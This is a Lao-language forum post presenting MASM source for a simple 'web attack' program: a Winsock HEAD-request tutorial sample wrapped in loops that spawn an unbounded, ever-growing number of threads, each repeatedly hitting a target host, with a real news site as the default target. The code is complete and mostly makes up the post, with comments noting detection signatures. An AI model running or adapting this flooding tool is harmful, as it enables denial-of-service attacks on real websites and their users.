
 [MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ

ตั้งหัวข้อเรื่อง: [MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ   [MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ EmptyTue Mar 30, 2010 11:27 am

ຄວາມຈິງເພິ່ນບໍ່ໄດ້ຕັ້ງໃຈຂຽນໃຫ້ມັນຍິງເວັບ, ເຫດເກີດຈາກຄວາມຜິດພາດຂອງການວົນ Loop ແລະ Thread ໃນການຂຽນ Code ເພິ່ນກະເລຍເອົາມາທົດລອງໃຊ້ໃນທາງທີ່ຜິດ ແກ້ເຊັງວ່າຊັ້ນ Wink

ໃນຮູບ ທົດສອບກັບເຄື່ອງໂຕເອງ ແລະ ໃຊ້ Delphi ຂຽນເປັນ server ຈຳລອງຂຶ້ນມາໃຫ້ສະແດງ log ທີ່ຍິງໄປ



[MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ I3810_attack


ເບິ່ງ Code ເຕັມໆໄດ້ທີ່
http://www.madwizard.org/programming/tutorials/netasm/


ອັນນີ້ແມ່ນ Code ທີ່ເພີ່ມ Loop ແລະ Thread ໂຕທີ່ເປັນບັນຫາ



; Head request example
; View with tabsize = 4
; Part of the Winsock networking tutorial by Thomas Bleeker
; Visit www.MadWizard.org
;
; Target: 32-bit x86, flat model, stdcall default, MASM syntax.
; The sample performs a single HTTP HEAD request. According to the post
; text, the second .data block below and the procs after RequestHeaders
; (Web, ProcsThread, StartProcessThread, start) are the poster's additions
; that wrap the sample in loops and threads.
.586
.model flat, stdcall
option casemap:none
include <windows.inc>
include <kernel32.inc>
include <user32.inc>
include <crtlib.inc> ; C runtime: printf, getmainargs
include <ws2_32.inc> ; the winsock 2 include
includelib <kernel32.lib>
includelib <user32.lib>
includelib <crtlib.lib>
includelib <ws2_32.lib> ; the winsock 2 library
; Forward declarations so the procs can be invoked before they are defined.
RequestHeaders proto stdcall :dword
FindHostIP proto stdcall :dword
main proto stdcall :dword, :dword
FillSockAddr proto stdcall :dword, :dword, :dword
.data
CR equ 0Dh
LF equ 0Ah
g_defaultServerName db "www.manager.co.th",0 ; host used by main when no argv[1] is supplied
SERVER_PORT equ 80
TEMP_BUFFER_SIZE equ 128 ; recv buffer; recv asks for one byte less to leave room for a NUL
REQ_WINSOCK_VER equ 2
; The request is sent in three pieces: part1, the host name, part2
; (see RequestHeaders). The literal "HEAD /", "User-agent: HeadReqSample"
; and "Connection: close" lines are what this program looks like on the
; wire, which is what a defender would key a signature on.
g_request_part1 db "HEAD / HTTP/1.1",CR,LF ; Get root index from server
db "Host: " ; Specify host name used
REQUEST_SIZE1 equ $ - g_request_part1 ; size of request part1 in bytes
g_request_part2 db CR,LF ; End hostname header from part1
db "User-agent: HeadReqSample",CR,LF ; Specify user agent
db "Connection: close",CR,LF ; Close connection after response
db CR,LF ; Empty line indicating the end of the request
REQUEST_SIZE2 equ $ - g_request_part2 ; size of request part2 in bytes
; Progress messages (each step prints a "doing X... " / "done." pair).
g_msgLookupHost db "Looking up hostname %s... ",0
g_msgFound db "found.",CR,LF,0
g_msgCreateSock db "Creating socket... ",0
g_msgCreated db "created.",CR,LF,0
g_msgConnect db "Attempting to connect to %s:%d... ",0
g_msgConnected db "connected.",CR,LF,0
g_msgSendReq db "Sending request... ",0
g_msgReqSent db "request sent.",CR,LF,0
g_msgDumpData db "Dumping received data...",CR,LF,CR,LF,0
g_msgInitWinsock db "Initializing winsock... ",0
g_msgInitialized db "initialized.",CR,LF,0
g_msgDone db "done.",CR,LF,0
g_msgCleanup db "Cleaning up winsock... ",0
; Error messages; the failing step loads one of these into ecx before
; jumping to its proc-local _error label.
g_errHostName db "could not resolve hostname.",CR,LF,0
g_errCreateSock db "could not create socket.",CR,LF,0
g_errConnect db "could not connect.",CR,LF,0
g_errSend db "failed to send data.",CR,LF,0
g_errRead db "socket error while receiving.",CR,LF,0
g_errStartup db "startup failed!",0
g_errVersion db "required version not supported!",0
g_errCleanup db "cleanup failed!",CR,LF,0
; Poster's additions: shared state for the loop/thread code at the end
; of the file. NOTE(review): all three are uninitialized, so `.data?`
; would be the conventional section for them.
.data
Attack DWORD ? ; cleared by Web at entry; no other write in this listing
DoSend DWORD ? ; toggled by start every 2 s to pace thread creation
lpThreadId DWORD ? ; receives the id of the most recently created thread
.code
;-------------------------------------------------------------------------------
; <FindHostIP>
;-------------------------------------------------------------------------------
; DWORD FindHostIP(const char *pServerName)            (stdcall)
; Parameters
; pServerName pointer to a NUL-terminated host name to resolve.
; Return value
; eax = first IPv4 address of the host, network byte order, or
; NULL when gethostbyname fails or its address list is empty.
; Clobbers: eax, ecx, edx, flags (ebx is saved/restored by the frame).
; Note: gethostbyname blocks and is IPv4-only; the answer is whatever
; the local resolver returns, so the caller should not treat it as
; more trustworthy than any other DNS reply.
FindHostIP proc uses ebx pServerName:dword
    invoke gethostbyname, [pServerName]
    ; Every failing step leaves eax = NULL, which is the documented
    ; "not found" result, so no separate error path is needed.
    .if eax != 0
        ; eax -> HOSTENT; descend to the first entry of h_list
        mov eax, [(hostent ptr [eax]).h_list]
        .if eax != 0
            mov eax, [eax]          ; eax -> first in_addr (NULL if list is empty)
            .if eax != 0
                mov eax, [eax]      ; eax = the address itself
            .endif
        .endif
    .endif
    ret
FindHostIP endp
;-------------------------------------------------------------------------------
; <FillSockAddr>
;-------------------------------------------------------------------------------
; DWORD FillSockAddr(sockaddr_in *pSockAddr, const char *pServerName,
;                    DWORD portNumber)                  (stdcall)
; Parameters
; pSockAddr pointer to the sockaddr_in to fill
; pServerName pointer to the NUL-terminated host name to resolve
; portNumber port in host byte order (only the low 16 bits are used)
; Return value
; eax = 0 when the host lookup failed (pSockAddr untouched),
; eax = the resolved address (non-zero) on success.
; Only sin_family, sin_port and sin_addr are written; sin_zero is left
; as the caller had it.
; Clobbers: eax, ecx, edx, flags.
FillSockAddr proc pSockAddr:dword, pServerName:dword, portNumber:dword
    invoke FindHostIP, [pServerName]
    .if eax != 0
        mov edx, [pSockAddr]
        ; address comes back from FindHostIP already in network order
        mov [edx][sockaddr_in.sin_addr.S_un.S_addr], eax
        mov [edx][sockaddr_in.sin_family], AF_INET
        mov ecx, [portNumber]
        rol cx, 8                   ; host -> network byte order (htons)
        mov [edx][sockaddr_in.sin_port], cx
    .endif
    ret
FillSockAddr endp
;-------------------------------------------------------------------------------
; <main>
;-------------------------------------------------------------------------------
; DWORD main(int argc, char **argv)                     (stdcall, ret 8)
; Initializes winsock, runs one RequestHeaders against argv[1] (or
; g_defaultServerName when argc < 2), then tears winsock down.
; Return value
; eax = 0 on success, 1 on any failure (message already printed).
; Register roles
; ebx = exit code across the cleanup calls (callee-saved by the frame)
; Error policy
; WSAStartup failure -> print, no WSACleanup (nothing to undo)
; wrong version      -> print, then the normal cleanup path
main proc uses ebx argc:dword, argv:dword
local wsaData:WSADATA
    invoke printf, addr g_msgInitWinsock
    invoke WSAStartup, REQ_WINSOCK_VER, addr wsaData
    test eax, eax
    jnz _startupFailed
    ; major version is the low byte of wVersion; require >= REQ_WINSOCK_VER
    cmp byte ptr [wsaData.wVersion], REQ_WINSOCK_VER
    jb _versionTooLow
    invoke printf, addr g_msgInitialized
    ; pick the host: argv[1] if present, otherwise the built-in default
    mov eax, [argv]
    mov ecx, offset g_defaultServerName
    cmp [argc], 2
    jb _haveHost
    mov ecx, [eax][1*4]             ; argv[1]
_haveHost:
    invoke RequestHeaders, ecx
    ; RequestHeaders returns 1 = ok, 0 = failed; invert to 0 = ok, 1 = failed
    xor eax, 1
    mov ebx, eax
_cleanup:
    invoke printf, addr g_msgCleanup
    invoke WSACleanup
    test eax, eax
    jz _done
    invoke printf, addr g_errCleanup
_done:
    invoke printf, addr g_msgDone
    mov eax, ebx
    ret
_versionTooLow:
    invoke printf, addr g_errVersion
    mov ebx, 1
    jmp _cleanup
_startupFailed:
    invoke printf, addr g_errStartup
    mov ebx, 1
    jmp _done
main endp
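;-------------------------------------------------------------------------------
; <RequestHeaders>
;-------------------------------------------------------------------------------
; DWORD RequestHeaders(const char *pServername)         (stdcall)
; Sends "HEAD / HTTP/1.1" to pServername:SERVER_PORT and prints whatever
; the server sends back until it closes the connection.
; Parameters
; pServername pointer to a NUL-terminated host name; it is resolved,
; connected to, and copied verbatim into the Host: header.
; Return value
; eax = 1 on success, 0 on any failure (an error message has been
; printed and the socket, if one was created, has been closed).
; Register roles
; esi = socket handle; INVALID_SOCKET until socket() succeeds
; ebx = host name pointer early on, then the return code
; ecx = pointer to the error message when jumping to _error
; Security note
; Everything received is untrusted server output. It is printed through
; an explicit "%s" format so that a reply containing '%' sequences is
; shown as text instead of being interpreted as printf directives (the
; original passed the buffer itself as the format string).
RequestHeaders proc uses ebx esi pServername:dword
local tempBuffer[TEMP_BUFFER_SIZE]:byte, sockAddr:sockaddr_in
    ; esi doubles as "was a socket created": INVALID_SOCKET means the
    ; error path must not call closesocket.
    mov esi, INVALID_SOCKET
    ; Lookup hostname:
    mov ebx, [pServername]
    invoke printf, addr g_msgLookupHost, ebx
    ; Resolve the host and fill family/port/address. Only those three
    ; fields are written; sin_zero stays uninitialized (connect ignores it).
    invoke FillSockAddr, addr sockAddr, ebx, SERVER_PORT
    mov ecx, offset g_errHostName
    test eax, eax
    jz _error
    invoke printf, addr g_msgFound
    ; Create socket:
    invoke printf, addr g_msgCreateSock
    invoke socket, AF_INET, SOCK_STREAM, IPPROTO_TCP
    mov ecx, offset g_errCreateSock
    cmp eax, INVALID_SOCKET
    je _error
    mov esi, eax                    ; from here on the socket must be closed on exit
    invoke printf, addr g_msgCreated
    ; Convert IP to ascii string and print connect message:
    invoke inet_ntoa, [sockAddr.sin_addr.S_un.S_addr]
    invoke printf, addr g_msgConnect, eax, SERVER_PORT
    ; Attempt to connect:
    invoke connect, esi, addr sockAddr, sizeof sockAddr
    mov ecx, offset g_errConnect
    test eax, eax
    jnz _error
    invoke printf, addr g_msgConnected
    invoke printf, addr g_msgSendReq
    ; The request goes out in three sends: fixed part 1, the host name,
    ; fixed part 2. Only SOCKET_ERROR is checked; a short send (fewer
    ; bytes than requested) is not detected.
    invoke send, esi, addr g_request_part1, REQUEST_SIZE1, 0
    mov ecx, offset g_errSend
    cmp eax, SOCKET_ERROR
    je _error
    invoke lstrlen, [pServername]
    invoke send, esi, [pServername], eax, 0
    mov ecx, offset g_errSend
    cmp eax, SOCKET_ERROR
    je _error
    invoke send, esi, addr g_request_part2, REQUEST_SIZE2, 0
    mov ecx, offset g_errSend
    cmp eax, SOCKET_ERROR
    je _error
    ; all sends succeeded
    invoke printf, addr g_msgReqSent
    invoke printf, addr g_msgDumpData
    ; Receive until the server closes the connection.
_recvLoop:
    ; Ask for one byte less than the buffer so the NUL written below
    ; always lands inside tempBuffer.
    invoke recv, esi, addr tempBuffer, TEMP_BUFFER_SIZE-1, 0
    test eax, eax
    mov ecx, offset g_errRead
    jz _connectionClosed            ; 0 bytes: peer closed the connection
    cmp eax, SOCKET_ERROR
    je _error
    ; eax = bytes received (1..TEMP_BUFFER_SIZE-1). NUL-terminate and
    ; print the chunk as data, never as the format string: the bytes
    ; are server-controlled.
    mov [tempBuffer][eax], 0
    invoke printf, offset _fmtString, addr tempBuffer
    jmp _recvLoop
_connectionClosed:
    mov ebx, 1                      ; return code (1 = no error)
_cleanup:
    ; close socket if it was created:
    cmp esi, INVALID_SOCKET
    je @F
    invoke closesocket, esi
@@:
    mov eax, ebx
    ret
_error:
    ; ecx -> message naming the step that failed
    invoke printf, ecx
    xor ebx, ebx                    ; return code (0 = error)
    jmp _cleanup
    ; Read-only "%s" format for the received data. It sits after an
    ; unconditional jmp, so these bytes are never executed.
_fmtString db "%s",0
RequestHeaders endp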
;-------------------------------------------------------------------------------
; <Web>
;-------------------------------------------------------------------------------
; Not part of the MadWizard sample (per the post text, this is the added
; loop). Runs main in a loop: each pass re-reads the C runtime's
; argc/argv, performs one HEAD request via main -> RequestHeaders, then
; sleeps 3 s. Called from ProcsThread, so every thread started by
; StartProcessThread runs its own copy of this loop.
; Attack is cleared on entry and nothing else in this listing writes it,
; so the .until test never succeeds and the Ret below is not reached.
; Stack: sub 12 / add 4 leaves argc and argv on the stack; main is stdcall
; with two dword params, so its ret pops them and the stack is balanced
; on every iteration.
Web Proc
mov Attack, FALSE
.repeat
sub esp, 12 ; three dword slots: [esp]=env, [esp+4]=argc, [esp+8]=argv
lea eax, [esp+0] ; &env
lea ecx, [esp+4] ; &argc
lea edx, [esp+8] ; &argv
invoke getmainargs, ecx, edx, eax, 0
add esp, 4 ; remove env (not used); argc, argv now sit where stdcall expects them
call main ; main(argc, argv): one request; its ret 8 drops both args
invoke Sleep,3000
.until Attack == TRUE
Ret
Web EndP
;-------------------------------------------------------------------------------
; <ProcsThread>
;-------------------------------------------------------------------------------
; Thread entry passed to CreateThread by StartProcessThread
; (signature: one DWORD parameter, DWORD return). lpParam is unused.
; Calls Web with a 1 s pause between calls. Since Web's loop has no
; satisfiable exit condition, the first invoke never returns and the
; Sleep, the jmp @B, the xor and the ret are effectively unreachable.
ProcsThread proc lpParam: DWORD
@@:
invoke Web
invoke Sleep, 1000
jmp @B
xor eax, eax ; thread exit code (not reached in practice)
ret
ProcsThread endp
;-------------------------------------------------------------------------------
; <StartProcessThread>
;-------------------------------------------------------------------------------
; Creates one more ProcsThread with default security attributes and
; stack size, running immediately. The thread id is written to the
; shared global lpThreadId (overwritten by every call, so only the last
; id survives). Returns eax = thread handle, or NULL on failure; the only
; caller in this listing (start) ignores it and never calls CloseHandle,
; so each call leaks one thread handle.
StartProcessThread proc
invoke CreateThread, NULL, 0, offset ProcsThread, 0, 0, addr lpThreadId
ret
StartProcessThread endp
;-------------------------------------------------------------------------------
; <start> - program entry point (see `end start`)
;-------------------------------------------------------------------------------
; Toggles DoSend every 2 s. On a TRUE pass it starts a new ProcsThread;
; on a FALSE pass it only re-arms the flag. Net effect: one additional
; request thread every 4 s, with no upper bound and no exit condition.
; The ExitProcess call sits after an unconditional jmp and is never
; reached; the process only ends when terminated externally.
; From a defender's view every thread opens a fresh TCP connection per
; request carrying the fixed "HEAD / HTTP/1.1", "User-agent:
; HeadReqSample" and "Connection: close" lines from g_request_part1/2,
; which is a simple pattern to alert on or rate-limit at the server.
start:
mov DoSend, TRUE
@@:
.IF DoSend
invoke StartProcessThread ; handle returned in eax is discarded
mov DoSend, FALSE
.ELSE
mov DoSend, TRUE
.ENDIF
invoke Sleep, 2000
jmp @b
invoke ExitProcess, eax ; unreachable: the jmp above is unconditional
end start